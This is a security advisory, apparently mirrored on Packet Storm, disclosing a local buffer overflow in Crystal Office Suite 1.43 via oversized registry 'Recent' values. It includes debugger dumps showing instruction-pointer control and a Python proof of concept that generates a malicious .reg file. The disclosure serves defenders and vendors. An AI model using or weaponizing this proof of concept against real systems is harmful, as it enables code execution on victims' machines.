what you don't know can hurt you

Crystal Office Suite 1.43 Buffer Overflow

Crystal Office Suite 1.43 Buffer Overflow
Posted Apr 12, 2012
Authored by Julien Ahrens | Site vulnerability-lab.com

Crystal Office Suite version 1.43 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
MD5 | 7d883567a56b639b0c85176c16850cb4

Crystal Office Suite 1.43 Buffer Overflow

Change Mirror Download
Title:
======
Crystal Office Suite v1.43 - Buffer Overflow Vulnerability


Date:
=====
2012-04-12


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=489


VL-ID:
=====
489


Introduction:
=============
Crystal Office is the essential office suite ideal for home and business users, delivering more tools that make your work go
faster and your life go easier. Find all the essential office software to complete routine tasks faster and with better results.
Create and edit text and graphics in letters, reports, documents and Web pages. Perform calculation and manage lists in
spreadsheets. Keep track of appointments and tasks. Open, edit and save Microsoft® Office documents.

Whats Included:

• NotePro - feature-packed easy to use word processor. Create polished documents of any length or type, including reports,
letters, resumes and brochures. Manage standard text files, Rich Text Format, Word, and HTML.

• DayMate - a versatile intuitive day planner. Use DayMate to create and schedule reminders that can pop up messages, start
applications or open documents, check for new e-mail, dial phone numbers, send messages, and open a specified Web sites.

• CellPro - a powerful and easy-to-use spreadsheet application. Use CellPro to create budgets, invoices, receipts and
expense reports. Organize, analyze and manage important data and financial information. Open and save Microsoft Excel files.

• ChartPro - a project management software application that is used to create and display projects using a Work Breakdown
Structure (WBS) chart. A WBS chart displays the structure of a project showing how a project is organized into summary
and detail levels. Using a WBS chart is a more intuitive approach to planning and displaying a project.

• Clip Plus - the award-winning Windows Clipboard enhancer. It works alongside the regular clipboard and automatically grabs
and saves text, images, and objects as they are copied to the clipboard - making them available for saving, reuse, and printing.

(Copy of the Vendor Homepage: http://www.crystaloffice.com )


Abstract:
=========
A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on Crystal Office Suite v1.43.


Report-Timeline:
================
2012-04-02: Vendor Notification 1
2012-04-08: Vendor Notification 2
2012-04-09: Vendor Response/Feedback
2012-04-12: Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================
Cristal Office Systems
Product: Office Suite, CellPro, ChartPro, ClipPlus & NotePro v1.43, 1.23, 1.23, 1.43 & 3.88


Exploitation-Technique:
=======================
Local


Severity:
=========
High


Details:
========
A Buffer Overflow vulnerability is detected on Crystal Office Suite v1.43 (current version). Vulnerable are all included
programs: CellPro, ChartPro, ClipPlus, NotePro.

The vulnerability is located in each of the program executeables. An oversized string on the registry values Recent1, Recent2
etc. within the keys:

[HKEY_CURRENT_USER/Software/Crystal Office/CellPro]
[HKEY_CURRENT_USER/Software/Crystal Office/ChartPro]
[HKEY_CURRENT_USER/Software/Crystal Office/ClipPlus]
[HKEY_CURRENT_USER/Software/Crystal Office/NotePro]

Results in a local buffer overflow. The value is read while opening the file menu. An attacker needs to manipulate the registry
value and has to trick the victim to hover over the ReOpen menu item within the File menu.


--- Debug Logs ---

# Registers:
EAX 00000000
ECX 42424242
EDX 7C9132BC ntdll.7C9132BC
EBX 00000000
ESP 0012E4E8
EBP 0012E508
ESI 00000000
EDI 00000000
EIP 42424242

# Stack:
0012E4D8 7C929F68 ntdll.7C929F68
0012E4DC 01B40000
0012E4E0 7C91D80A ntdll.7C91D80A
0012E4E4 7C9601E1 ntdll.7C9601E1
0012E4E8 7C9132A8 RETURN to ntdll.7C9132A8 <--ESP
0012E4EC 0012E5D0
0012E4F0 0012F900 ASCII AAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
0012E4F4 0012E5EC
0012E4F8 0012E5A4

# Disassembly:
7C91329D FF75 0C PUSH DWORD PTR SS:[EBP+C]
7C9132A0 FF75 08 PUSH DWORD PTR SS:[EBP+8]
7C9132A3 8B4D 18 MOV ECX,DWORD PTR SS:[EBP+18]
7C9132A6 FFD1 CALL ECX
7C9132A8 64:8B25 00000000 MOV ESP,DWORD PTR FS:[0]
7C9132AF 64:8F05 00000000 POP DWORD PTR FS:[0]
7C9132B6 8BE5 MOV ESP,EBP
7C9132B8 5D POP EBP
7C9132B9 C2 1400 RETN 14
7C9132BC 8B4C24 04 MOV ECX,DWORD PTR SS:[ESP+4]

# Dump:
0012F8E8 41 41 41 41 41 41 41 41 AAAAAAAA
0012F8F0 41 41 41 41 41 41 41 41 AAAAAAAA
0012F8F8 41 41 41 41 41 41 41 41 AAAAAAAA
0012F900 41 41 41 41 42 42 42 42 AAAABBBB
0012F908 43 43 43 43 43 43 43 43 CCCCCCCC
0012F910 43 43 43 43 43 43 43 43 CCCCCCCC
0012F918 43 43 43 43 43 43 43 43 CCCCCCCC


Picture(s):
../1.png


Proof of Concept:
=================
The vulnerability can be exploited by local attackers or local low privileged system accounts. For demonstration or reproduce ...

#!/usr/bin/python

# Exploit: Crystal Office Suite v1.43 Local Buffer Overflow Vulnerability
# Version: 1.43
# Software Link: http://www.crystaloffice.com
# Notes: Vulnerable: CellPro, ChartPro, ClipPlus, NotePro
# Howto: Import Reg -> Start App -> Move Mouse over "File" - Menuitem "ReOpen"

file="poc.reg"

junk1="\x41" * 4124
boom="\x42\x42\x42\x42"
junk2="\x43" * 100

poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\Crystal Office\CellPro]\n"
poc=poc + "\"Recent1\"=\"" + junk1 + boom + junk2 + "\""

try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";


Solution:
=========
Patch will be provided with the next service update on www.crystaloffice.com


Risk:
=====
The security risk of the local buffer overflow vulnerability is estimated as high.


Credits:
========
Vulnerability Research Laboratory Team - Julien Ahrens (MrTuxracer) [www.inshell.net]


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012 Vulnerability-Lab




--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@vulnerability-lab.com

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    2 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close